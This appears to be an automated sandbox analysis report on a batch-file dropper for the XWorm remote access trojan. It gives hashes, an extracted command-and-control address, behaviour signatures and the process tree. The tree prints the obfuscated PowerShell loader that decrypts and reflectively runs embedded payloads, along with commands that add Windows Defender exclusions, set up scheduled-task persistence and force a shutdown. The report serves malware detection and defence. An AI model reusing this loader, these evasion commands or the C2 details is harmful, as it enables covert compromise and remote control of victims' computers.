Analysis

  • max time kernel
    72s
  • max time network
    73s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    07-09-2024 16:21

Errors

Reason
Machine shutdown

General

  • Target

    Xworm Fixer.bat

  • Size

    442KB

  • MD5

    ccf46201786b2facd7b19ea6129944da

  • SHA1

    25e51f0e98977de48e111773058cc1b70ced0892

  • SHA256

    74cdc51bc00b8f596fb764469b16ec2edb336cf9f151697ff984a5081c3204d6

  • SHA512

    43a92ed1caf5a517e4e1506127b96b07c75458701e4d0b0556fc79694866fb27089ed919688c7ff68c7c2a87b51ef2e635d85bfa8a5aa860f132bfb1fbe13675

  • SSDEEP

    6144:7iCje5mpo5kEu3ojrKYMwoocilcJohGUMJb0YXZyDC3ntd0FqT/G+PYDKhJaltT7:Xi5mpJEu3mkR4LMxZye3ntqFKFPTjWZ

Malware Config

Extracted

Family

xworm

C2

manufacturer-rank.gl.at.ply.gg:60383

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Xworm Fixer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('o1j2aeFxATS/LMnhyTtPZh88JKeZO7a/GlRllyMvGKg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OkQnfLRJOt+ggCAP/xzZGA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QmUAh=New-Object System.IO.MemoryStream(,$param_var); $PKXDP=New-Object System.IO.MemoryStream; $nocnw=New-Object System.IO.Compression.GZipStream($QmUAh, [IO.Compression.CompressionMode]::Decompress); $nocnw.CopyTo($PKXDP); $nocnw.Dispose(); $QmUAh.Dispose(); $PKXDP.Dispose(); $PKXDP.ToArray();}function execute_function($param_var,$param2_var){ $RADPl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qkeSZ=$RADPl.EntryPoint; $qkeSZ.Invoke($null, $param2_var);}$JTvsg = 'C:\Users\Admin\AppData\Local\Temp\Xworm Fixer.bat';$host.UI.RawUI.WindowTitle = $JTvsg;$zlCYh=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JTvsg).Split([Environment]::NewLine);foreach ($GJRIG in $zlCYh) { if ($GJRIG.StartsWith(':: ')) { $PnLCB=$GJRIG.Substring(3); break; }}$payloads_var=[string[]]$PnLCB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4144
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_496_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_496.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2812
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_496.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3332
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_496.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1396
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('o1j2aeFxATS/LMnhyTtPZh88JKeZO7a/GlRllyMvGKg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OkQnfLRJOt+ggCAP/xzZGA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QmUAh=New-Object System.IO.MemoryStream(,$param_var); $PKXDP=New-Object System.IO.MemoryStream; $nocnw=New-Object System.IO.Compression.GZipStream($QmUAh, [IO.Compression.CompressionMode]::Decompress); $nocnw.CopyTo($PKXDP); $nocnw.Dispose(); $QmUAh.Dispose(); $PKXDP.Dispose(); $PKXDP.ToArray();}function execute_function($param_var,$param2_var){ $RADPl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qkeSZ=$RADPl.EntryPoint; $qkeSZ.Invoke($null, $param2_var);}$JTvsg = 'C:\Users\Admin\AppData\Roaming\startup_str_496.bat';$host.UI.RawUI.WindowTitle = $JTvsg;$zlCYh=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JTvsg).Split([Environment]::NewLine);foreach ($GJRIG in $zlCYh) { if ($GJRIG.StartsWith(':: ')) { $PnLCB=$GJRIG.Substring(3); break; }}$payloads_var=[string[]]$PnLCB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1532
            • C:\Users\Admin\AppData\Local\Temp\PNG.exe
              "C:\Users\Admin\AppData\Local\Temp\PNG.exe"
              6⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3176
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PNG.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3140
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PNG.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2224
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3716
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2544
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1248
              • C:\Windows\SYSTEM32\shutdown.exe
                shutdown.exe /f /s /t 0
                7⤵
                  PID:656
    • C:\Users\Admin\AppData\Roaming\System User
      "C:\Users\Admin\AppData\Roaming\System User"
      1⤵
      • Executes dropped EXE
      PID:1540
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x4 /state0:0xa3a25055 /state1:0x41c64e6d
      1⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of SetWindowsHookEx
      PID:3504

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      df472dcddb36aa24247f8c8d8a517bd7

      SHA1

      6f54967355e507294cbc86662a6fbeedac9d7030

      SHA256

      e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

      SHA512

      06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      c24caab1947646fcc49d6158d78a56f5

      SHA1

      aa2cd00401eb273991f2d6fdc739d473ff6e8319

      SHA256

      0696315ad3df3edd5426276c265bd13d8bd2a0d101548bcaedd82e2aebde655a

      SHA512

      35e1d214dfb4c7f078496e3e303aea152aa48f9db5b9aa188aeb82b541582ed77f60bfe8712836232b5aa31d3645edfc79b42c8f90e92e06778f21aa44971bff

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      824da05d0f31c23ab953467d7a3812f7

      SHA1

      48349c5986cb56777bf77e747eafbc2f87dfc2c1

      SHA256

      6d266b3c94b03d8ed8648328f707c58177b2075c963aff4cbe6576d93df518b8

      SHA512

      5c35ada146f86ebaefc96d82f7176f7ccabf179a5297b04fb7f56a88cb6a8a1b1bb159b04599cf8f581f49a08137530aa3cc8a1e5c67a383880c6998e84c5367

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      069a5afc0d3844d09974a80aa9ecfb36

      SHA1

      a2f83dc0acd091044e65eb9051fc18bca4c0f35f

      SHA256

      79c7b69021195d10ef1c425831562d4772e11079210542d86aad6e00c8561ede

      SHA512

      24b5317d67773ed96a3ca7e502aeaadf367290c25f7482c19811182d877430ef8e225922f7c0c89bb767015972130ec97268cbed367d24d3e663d034c9ca3648

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      d0a4a3b9a52b8fe3b019f6cd0ef3dad6

      SHA1

      fed70ce7834c3b97edbd078eccda1e5effa527cd

      SHA256

      21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

      SHA512

      1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      e07eea85a8893f23fb814cf4b3ed974c

      SHA1

      8a8125b2890bbddbfc3531d0ee4393dbbf5936fe

      SHA256

      83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea

      SHA512

      9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

    • C:\Users\Admin\AppData\Local\Temp\PNG.exe

      Filesize

      437KB

      MD5

      3c21cd756c5f0ae7ac13dd21b086e53b

      SHA1

      4216831c140c537e19c9f66e845583f2231e2435

      SHA256

      aab3729408b3b167f77a291abdd6becd043066521880b911c5e29115cdebea04

      SHA512

      42d717e11b61fefc29e64d3b6a17eb97f7f67a8fde4a9f01f0f92ce647ba4d19e2e2aa68c9964023985678ec15427953d543f78fa4ee037971901244ba5da77f

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1wnllpre.hys.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\startup_str_496.bat

      Filesize

      442KB

      MD5

      ccf46201786b2facd7b19ea6129944da

      SHA1

      25e51f0e98977de48e111773058cc1b70ced0892

      SHA256

      74cdc51bc00b8f596fb764469b16ec2edb336cf9f151697ff984a5081c3204d6

      SHA512

      43a92ed1caf5a517e4e1506127b96b07c75458701e4d0b0556fc79694866fb27089ed919688c7ff68c7c2a87b51ef2e635d85bfa8a5aa860f132bfb1fbe13675

    • C:\Users\Admin\AppData\Roaming\startup_str_496.vbs

      Filesize

      115B

      MD5

      e520a1271529ce39773dac176bbdf0fc

      SHA1

      09a1ba7f79fb7e974a2aea036c6a08d4c2e51f5b

      SHA256

      446858539d1704379372857fd248a9e1387d5e253a1528f1d961b16aa137dcf4

      SHA512

      379478c2a0d8a7174ace7ee4459bd0f47e640e58212f082c25b997aab06e7f46316125a20a7a59828d95fce46a35dd4579992896b8cf52ef7f9501d60a9280b3

    • memory/1532-48-0x0000019530DE0000-0x0000019530E0E000-memory.dmp

      Filesize

      184KB

    • memory/2812-16-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

      Filesize

      10.8MB

    • memory/2812-30-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

      Filesize

      10.8MB

    • memory/2812-27-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

      Filesize

      10.8MB

    • memory/2812-26-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

      Filesize

      10.8MB

    • memory/2812-25-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

      Filesize

      10.8MB

    • memory/3176-63-0x00000000008A0000-0x0000000000914000-memory.dmp

      Filesize

      464KB

    • memory/3176-111-0x00000000010E0000-0x0000000001190000-memory.dmp

      Filesize

      704KB

    • memory/4144-13-0x0000023CF3C90000-0x0000023CF3C98000-memory.dmp

      Filesize

      32KB

    • memory/4144-49-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

      Filesize

      10.8MB

    • memory/4144-14-0x0000023CF3F10000-0x0000023CF3F66000-memory.dmp

      Filesize

      344KB

    • memory/4144-0-0x00007FFDC8A73000-0x00007FFDC8A75000-memory.dmp

      Filesize

      8KB

    • memory/4144-12-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

      Filesize

      10.8MB

    • memory/4144-11-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

      Filesize

      10.8MB

    • memory/4144-10-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

      Filesize

      10.8MB

    • memory/4144-9-0x0000023CF3C60000-0x0000023CF3C82000-memory.dmp

      Filesize

      136KB